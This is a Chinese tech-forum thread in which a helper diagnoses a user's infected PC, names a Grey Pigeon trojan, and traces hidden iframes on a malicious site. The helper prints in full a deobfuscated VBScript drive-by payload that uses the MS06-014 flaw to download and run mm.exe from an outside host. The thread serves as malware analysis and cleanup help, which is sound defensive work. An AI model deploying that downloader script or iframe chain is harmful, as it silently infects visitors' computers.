最近我的电脑不停的访问以下网页,这个页面是百度的搜索页面,估计是在页面中植入了病毒.
http://www.hdsdbook.com.cn/1.htm

刚启动了系统在任务管理器中就有"iexplore.exe"这个进程,但我没有打开浏览器啊
系统中除了"C:\program files\internet explorer\iexplore.exe"其它地方没有iexplore.exe程序

大家看一下,急......

在你提供的那个启动项列表窗口中，删除以下项目：
Display Panning CPL Extension
Fax_Service
WinDHCPsvc
44A336C1.dll

重启后删除对应的文件（也就是映像路径里的那个文件路径）
其中Fax_Service（C:\WINDOWS\fax_ser.exe）是灰鸽子，也就是直接导致你所描述“任务管理器中就有"iexplore.exe"这个进程”的症状的原因

至于想知道http://www.hdsdbook.com.cn/1.htm内里有什么乾坤：
代码上方有一段：
<iframe src=http://www.hdsdbook.com.cn/setup/help.htm width=0 height=0></iframe>

help.htm又有一段：
<iframe src=http://www.wzxqy.com/11/index.htm width=0 height=0></iframe>

index.htm里有一段：
<iframe src=http://www.wzxqy.com/2/index.asp width=0 height=0></iframe>

index.asp，加了N多无用的空格（低劣幼稚的方法）
实际内容中有：
<frame src="01.asp" frameborder="no" scrolling="no" noresize marginwidth="0" marging height="0">
<frame src="02.asp" frameborder="no" scrolling="no" noresize marginwidth="0" marging height="0">

http://www.wzxqy.com/2/01.asp和http://www.wzxqy.com/2/02.asp还是加了N多空格（又一次幼稚的做法）
实际内容，忒无聊，利用MS06-014漏洞，下载http://www.wzxqy.com/2/mm.exe到临时文件夹命名为userinit.exe（01.asp把它命名为这个）或fobnn.exe（02.asp的命名）并执行。

还发现了有趣的东西，01.asp的代码实质上是：
<html>
<script language="VBScript">
    on error resume next
    QQ112807930="http://www.wzxqy.com/2/mm.exe"
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Adodb."
    a4="Stream"
    str1=a1&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, QQ112807930, False
    x.Send
    fname1="userinit.exe"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"",""
</script>
</html>

一个连QQ都敢放上代码，却只做了加空格和乱码这么幼稚的处理就挂上去的人，也太傻了点吧？！

mm.exe只有5K，看来可能是个下载器。

哈哈，这mm.exe相当地“可爱”哟
运行后产生C:\D.bat删除原文件并删除自身
释放C:\WINDOWS\system32\drivers\CelInDriver.sys并加载
调用IE下载js.exe，由js.exe连网下载东西，结果下载下来和释放出来的及其运行之后产生的文件颇多

包括有：
C:\WINDOWS\system32\js.exe
C:\WINDOWS\system32\qq.exe
C:\WINDOWS\system32\wl.exe
C:\WINDOWS\system32\wow.exe
C:\WINDOWS\system32\wow.dat
C:\WINDOWS\system32\zt.exe
C:\WINDOWS\system32\zt.dat
C:\WINDOWS\system32\windhcp.ocx
C:\WINDOWS\system32\windhcp.dll


还有以下的一些，就更加眼熟了（参考置顶帖，只不过是文件名变了而已）：
C:\WINDOWS\help\wshmcepts.chm
C:\Program Files\Common Files\Microsoft Shared\MSINFO\0E371DEB.dll（瑞星报毒Trojan.PSW.QQRobber.2.h）
C:\Program Files\Common Files\Microsoft Shared\MSINFO\0E371DEB.dat
修改C:\WINDOW\system32\verclsid.exe为verclsid.exe.bak

临时文件夹中还有（明显是调用IE下载的）
C:\Documents and Settings\用户名\Local Settings\Temp里的：
kozgf.dll
saas.sys
tempjs.exe

C:\Documents and Settings\用户名\Local Settings\Temporary Internet Files\Content.IE5里的：
26KVEFJ0\qq[1].exe
EWRRUQ7U\js[1].exe
EWRRUQ7U\wow[1].exe
GIDN1FVM\zt[1].exe
HAP8G01R\wl[1].exe

谢了,小聪.这么愉快就把问题搞透彻了.

哈哈,你在以身试毒啊

MM？？我喜欢的说....